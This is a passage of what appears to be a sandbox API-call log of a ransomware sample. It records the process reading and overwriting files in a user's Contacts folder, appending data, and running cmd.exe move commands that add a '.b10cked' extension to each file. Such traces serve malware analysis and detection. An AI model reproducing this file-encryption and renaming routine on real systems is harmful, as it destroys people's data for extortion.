lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0218.503] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a88, nNumberOfBytesToRead=0x274, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a88*, lpNumberOfBytesRead=0x12ec08*=0x274, lpOverlapped=0x0) returned 1 [0218.503] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0218.503] WriteFile (in: hFile=0x1b4, lpBuffer=0x1279be8*, nNumberOfBytesToWrite=0x274, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1279be8*, lpNumberOfBytesWritten=0x12ec1c*=0x274, lpOverlapped=0x0) returned 1 [0218.503] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-628, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x277 [0218.503] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a88, nNumberOfBytesToRead=0x274, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a88*, lpNumberOfBytesRead=0x12ec08*=0x274, lpOverlapped=0x0) returned 1 [0218.504] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-628, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x277 [0218.504] WriteFile (in: hFile=0x1b4, lpBuffer=0x1279be8*, nNumberOfBytesToWrite=0x274, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1279be8*, lpNumberOfBytesWritten=0x12ec1c*=0x274, lpOverlapped=0x0) returned 1 [0218.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ihnvbh euuncnh.contact", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0218.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ihnvbh euuncnh.contact", cchWideChar=22, lpMultiByteStr=0x13286a4, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ihnvbh euuncnh.contact", lpUsedDefaultChar=0x0) returned 22 [0218.507] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x4eb [0218.507] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0218.507] CloseHandle (hObject=0x1b4) returned 1 [0218.508] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Contacts\\IHNVBH~1.CON") returned 0x26 [0218.508] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Contacts\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Contacts\\") returned 0x1a [0218.509] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\IHNVBH~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\IHNVBH~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x698, dwThreadId=0x514)) returned 1 [0218.512] CloseHandle (hObject=0x120) returned 1 [0218.512] CloseHandle (hObject=0x1b4) returned 1 [0218.512] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0218.512] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0218.512] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount1=26, lpString2="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount2=26) returned 2 [0218.512] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0218.512] ReleaseMutex (hMutex=0xf8) returned 1 [0218.512] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0218.512] ReleaseMutex (hMutex=0xf8) returned 1 [0218.512] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0218.512] ReleaseMutex (hMutex=0xf8) returned 1 [0218.512] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0218.512] ReleaseMutex (hMutex=0xf8) returned 1 [0218.512] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact" (normalized: "c:\\users\\eebsym5\\contacts\\lodkd auftnm.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0218.513] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.513] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4e8 [0218.513] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.513] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27530217750) returned 1 [0218.513] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.513] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4e8 [0218.513] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.513] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.513] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4e8 [0218.513] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.513] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0218.513] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x4e8 [0218.513] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0218.513] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.513] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4e8 [0218.513] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4e8 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4e8 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4e8 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4e8 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4e8 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x4e8 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x4e8 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0218.515] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0218.515] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a88, nNumberOfBytesToRead=0x273, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a88*, lpNumberOfBytesRead=0x12ec08*=0x273, lpOverlapped=0x0) returned 1 [0219.233] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.233] WriteFile (in: hFile=0x1b4, lpBuffer=0x1279be8*, nNumberOfBytesToWrite=0x273, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1279be8*, lpNumberOfBytesWritten=0x12ec1c*=0x273, lpOverlapped=0x0) returned 1 [0219.233] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-627, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x275 [0219.234] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a88, nNumberOfBytesToRead=0x273, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a88*, lpNumberOfBytesRead=0x12ec08*=0x273, lpOverlapped=0x0) returned 1 [0219.234] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-627, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x275 [0219.234] WriteFile (in: hFile=0x1b4, lpBuffer=0x1279be8*, nNumberOfBytesToWrite=0x273, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1279be8*, lpNumberOfBytesWritten=0x12ec1c*=0x273, lpOverlapped=0x0) returned 1 [0219.237] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lodkd auftnm.contact", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0219.237] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lodkd auftnm.contact", cchWideChar=20, lpMultiByteStr=0x13286a4, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lodkd auftnm.contact", lpUsedDefaultChar=0x0) returned 20 [0219.237] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x4e8 [0219.237] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0219.238] CloseHandle (hObject=0x1b4) returned 1 [0219.238] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Contacts\\LODKDA~1.CON") returned 0x26 [0219.239] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Contacts\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Contacts\\") returned 0x1a [0219.239] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\LODKDA~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\LODKDA~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x78c, dwThreadId=0xe9c)) returned 1 [0219.242] CloseHandle (hObject=0x120) returned 1 [0219.242] CloseHandle (hObject=0x1b4) returned 1 [0219.242] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0219.242] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0219.242] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount1=26, lpString2="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount2=26) returned 2 [0219.242] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.242] ReleaseMutex (hMutex=0xf8) returned 1 [0219.242] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.242] ReleaseMutex (hMutex=0xf8) returned 1 [0219.242] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.242] ReleaseMutex (hMutex=0xf8) returned 1 [0219.242] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.242] ReleaseMutex (hMutex=0xf8) returned 1 [0219.242] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact" (normalized: "c:\\users\\eebsym5\\contacts\\mneuc uhnfghgg.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4e9 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.243] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27603190091) returned 1 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4e9 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4e9 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x4e9 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4e9 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4e9 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4e9 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.244] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.244] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4e9 [0219.244] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.244] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.244] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4e9 [0219.244] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.244] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.244] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4e9 [0219.244] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.244] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x1 [0219.244] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0219.245] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0219.245] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.245] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x4e9 [0219.245] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.245] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 